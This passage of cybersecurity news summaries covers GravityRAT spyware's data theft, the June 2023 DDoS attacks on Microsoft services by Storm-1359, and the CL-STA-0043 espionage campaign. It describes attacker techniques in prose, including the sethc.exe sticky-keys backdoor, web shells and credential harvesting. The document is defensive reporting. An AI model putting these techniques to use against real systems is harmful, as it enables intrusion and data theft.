Harmful Capabilities of GravityRAT: The latest iteration of GravityRAT spyware exhibits several harmful functionalities. It exfiltrates WhatsApp backups, deletes contacts, and erases call logs. Additionally, it steals media and document files in various formats, such as jpg, jpeg, log, png, PNG, JPG, JPEG, txt, pdf, xml, doc, xls, xlsx, and crypt32. The exfiltrated data is stored in text files on external storage media and transmitted to the command-and-control (C2) server before being removed from the victim's device.

Conclusion: The reappearance of GravityRAT highlights the ongoing activity of the threat actors behind this malware, who continuously enhance its capabilities to carry out sophisticated attacks. Notably, the new features primarily target mobile device users. It is essential for users to remain cautious when downloading apps from untrusted or third-party sources to mitigate the risk of infection.

Microsoft Confirms Cyberattacks Caused Disruptions to Outlook and Cloud Platform in Early June

 

Microsoft has revealed that the service disruptions experienced in early June 2023, affecting its flagship office suite, including Outlook email and OneDrive file-sharing apps, as well as its cloud computing platform, were the result of Layer 7 DDoS attacks. The attacks were carried out by a hacktivist group referred to as Storm-1359 by Microsoft. While the software giant confirmed the involvement of the group, it provided limited details about the impact and the number of affected customers. Microsoft assured users that no customer data was accessed or compromised during the attacks.

Attack Details and Attribution: Microsoft disclosed the nature of the attacks in a blog post following a request by The Associated Press. The post stated that the DDoS attacks temporarily affected the availability of some services. The attackers, known as Storm-1359 or Anonymous Sudan, aimed to disrupt and gain publicity. They likely utilized rented cloud infrastructure, virtual private networks, and botnets consisting of zombie computers to target Microsoft servers. While the group claimed responsibility on its Telegram social media channel, some security researchers suspect its affiliation to be Russian.

Impact and Response: The exact impact of the attacks on customers remains unclear, as Microsoft did not provide specific information. DDoS attacks, although primarily disruptive, can have significant consequences when targeting a software service giant like Microsoft, which plays a crucial role in global commerce. The lack of detailed impact assessment from Microsoft has left cybersecurity experts unable to measure the full extent of the disruptions. While some resources were inaccessible, the scope of the impact varies. The apparent unwillingness of Microsoft to provide objective measures suggests the magnitude of the incident.
Continued Threat and Recommendations: Microsoft's identification of the attackers as Storm-1359 indicates ongoing investigations into their affiliation. Pro-Russian hacking groups, including Killnet, have been carrying out similar DDoS attacks against Ukraine's allies. Analysts believe that Anonymous Sudan, despite its claims, is not located in Sudan but collaborates with pro-Kremlin groups to spread propaganda. The incident underscores the persistent risk posed by DDoS attacks, which remains an unsolved problem in cybersecurity. Experts emphasize the need for distributed services, such as content distribution networks, to mitigate the impact of such attacks.
Chronology of Events: The disruptions to Microsoft 365 office suite services were first reported on June 5, with a peak of 18,000 outage and problem reports on Down detector. Microsoft acknowledged the impact on Outlook, Microsoft Teams, SharePoint Online, and OneDrive for Business. The attacks persisted throughout the week, eventually affecting Microsoft's Azure cloud computing platform. On June 8, the cloud-based OneDrive file-hosting service experienced a global outage. However, desktop OneDrive clients remained unaffected.
Conclusion: The cyberattacks that targeted Microsoft's office suite and cloud platform in early June have been identified as Layer 7 DDoS attacks orchestrated by a hacktivist group called Storm-1359 or Anonymous Sudan. While the attacks caused disruptions and inconveniences, Microsoft has assured users that no customer data was compromised. The incident highlights the ongoing threat of DDoS attacks and the need for organizations to implement robust defenses, such as distributed service architectures. As investigations continue, cybersecurity experts stress the importance of addressing the challenge posed by DDoS attacks to ensure the resilience of critical digital services.

Advanced Cyber-Espionage Campaign Targets Middle Eastern and African Governments

 

Governmental entities in the Middle East and Africa have fallen victim to a series of sophisticated cyber-espionage attacks employing advanced techniques aimed at stealing credentials and exfiltrating Exchange emails. Lior Rochberger, senior threat researcher at Palo Alto Networks, described the attacks as a "true advanced persistent threat," primarily focusing on obtaining highly sensitive information related to politicians, military activities, and foreign affairs. The campaign, tracked by Palo Alto Networks' Cortex Threat Research team under the temporary name CL-STA-0043, demonstrates the use of never-before-seen tactics and represents a significant state-backed cyber threat.

Attack Methodology: The attack campaign starts with the exploitation of vulnerabilities in on-premises Internet Information Services (IIS) and Microsoft Exchange servers, allowing the adversaries to infiltrate targeted networks. Palo Alto Networks identified instances where the attackers attempted to execute the China Chopper web shell but switched tactics to utilize an in-memory Visual Basic Script implant from the Exchange Server. Once a successful breach occurs, reconnaissance activities are conducted to identify critical servers housing valuable data, including domain controllers, web servers, Exchange servers, FTP servers, and SQL databases.

Privilege Escalation and Backdoor Access: CL-STA-0043 employs various methods to escalate privileges and gain persistent access to compromised environments. The threat actors utilize native Windows tools, such as "sticky keys" (sethc.exe), to bypass login requirements and establish a backdoor. They replace the sethc.exe binary or modify registry references to execute cmd.exe, providing an elevated command prompt shell for running arbitrary commands. Similar tactics using the Utility Manager (utilman.exe) have been previously documented by CrowdStrike.

Innovative Techniques for Data Theft: In addition to leveraging Mimikatz for credential theft, the threat actors have employed novel methods for stealing passwords, lateral movement, and exfiltration of sensitive data. These techniques include executing a malicious DLL through network providers to harvest plaintext passwords and exporting them to a remote server. The attackers also utilize an open-source penetration testing toolset called Yasso to propagate across networks. Furthermore, they exploit the Exchange Management Shell and PowerShell snap-ins to gather emails of interest.

Attribution and Implications: The level of sophistication, adaptiveness, and victimology displayed by CL-STA-0043 strongly suggests the involvement of a highly capable APT threat actor, potentially operating on behalf of a nation-state. The campaign shares similarities with the activities of the Chinese state-sponsored group known as Silk Typhoon (formerly Hafnium), which targeted Microsoft Exchange Servers earlier this year. The ongoing attacks pose significant cybersecurity risks to governments in the Middle East and Africa and highlight the need for enhanced defensive measures and threat intelligence sharing.

Conclusion: The cyber-espionage campaign targeting Middle Eastern and African governments showcases the evolving tactics and capabilities of state-backed threat actors. The exploitation of vulnerabilities, advanced credential theft techniques, and exfiltration of sensitive data emphasize the importance of robust cybersecurity strategies and proactive defenses. Governments and organizations must remain vigilant, adopt best security practices, and collaborate to mitigate the risks posed by these sophisticated cyber threats.